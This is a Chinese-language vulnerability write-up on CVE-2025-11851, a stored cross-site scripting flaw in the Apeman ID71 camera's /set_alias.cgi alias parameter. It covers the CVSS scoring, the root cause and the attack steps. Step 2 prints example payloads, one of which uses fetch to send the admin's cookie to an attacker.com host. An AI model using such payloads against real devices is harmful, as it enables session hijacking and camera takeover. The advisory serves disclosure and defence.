CVE-2025-11851CVE-2025-11851是Apeman ID71网络摄像头固件EN75.8.53.20版本中存在的一个跨站脚本(XSS)漏洞。该漏洞位于设备的Web管理接口中的/set_alias.cgi文件,攻击者可以通过操纵alias参数注入恶意脚本代码。由于该接口是摄像头的配置管理页面,攻击者可以利用此漏洞在受害者的浏览器上下文中执行任意JavaScript代码。
该漏洞的CVSS 3.1评分为3.5分,属于低危级别。漏洞的攻击向量为网络(AV:N),攻击复杂度低(AC:L),但需要低权限认证(PR:L)且需要用户交互(UI:R)。从影响范围来看,该漏洞主要影响完整性(I:L),对机密性的影响较低,对可用性没有直接影响。
值得注意的是,该漏洞的发现者曾尝试联系Apeman厂商进行修复,但厂商未作出任何回应。漏洞的利用代码已在GitHub上公开披露,任何具备基本认证凭据的攻击者都可以利用此漏洞。该漏洞的存在反映了IoT设备在Web接口安全性方面的常见问题——缺乏对用户输入的充分验证和过滤。
该XSS漏洞的根本原因在于Apeman ID71摄像头固件的Web管理界面中,/set_alias.cgi端点未对alias参数进行充分的输入验证和输出编码。当用户通过Web界面修改设备别名(alias)时,设备固件直接将用户输入的alias值存储并在后续页面中反射输出,而没有进行HTML实体编码或过滤危险字符。
从技术层面分析,攻击流程如下:
1. 攻击者首先需要获取摄像头的管理访问凭据(用户名和密码),这可以通过默认凭据爆破、社会工程学或之前的数据泄露获得。
2. 攻击者构造包含恶意JavaScript代码的alias参数值,例如:<script>alert(document.cookie)</script>或更复杂的payload如<img src=x onerror=fetch('http://attacker.com/steal?c='+document.cookie)>。
3. 攻击者通过认证后的会话向/set_alias.cgi端点发送HTTP请求,将恶意payload作为alias参数提交。
4. 服务器存储该alias值,并在后续的管理页面中直接渲染输出。当合法管理员或用户访问包含该别名的页面时,恶意脚本将在其浏览器上下文中执行。
5. 由于该漏洞需要用户交互(UI:R),攻击者通常需要诱使管理员访问包含恶意alias的页面,或者通过钓鱼邮件等方式引导管理员点击特制链接。
该漏洞的利用可能导致会话劫持、权限提升(通过窃取管理员cookie)、钓鱼攻击或恶意操作。由于摄像头通常部署在敏感位置,攻击者还可以利用此漏洞作为进一步入侵网络的内网跳板。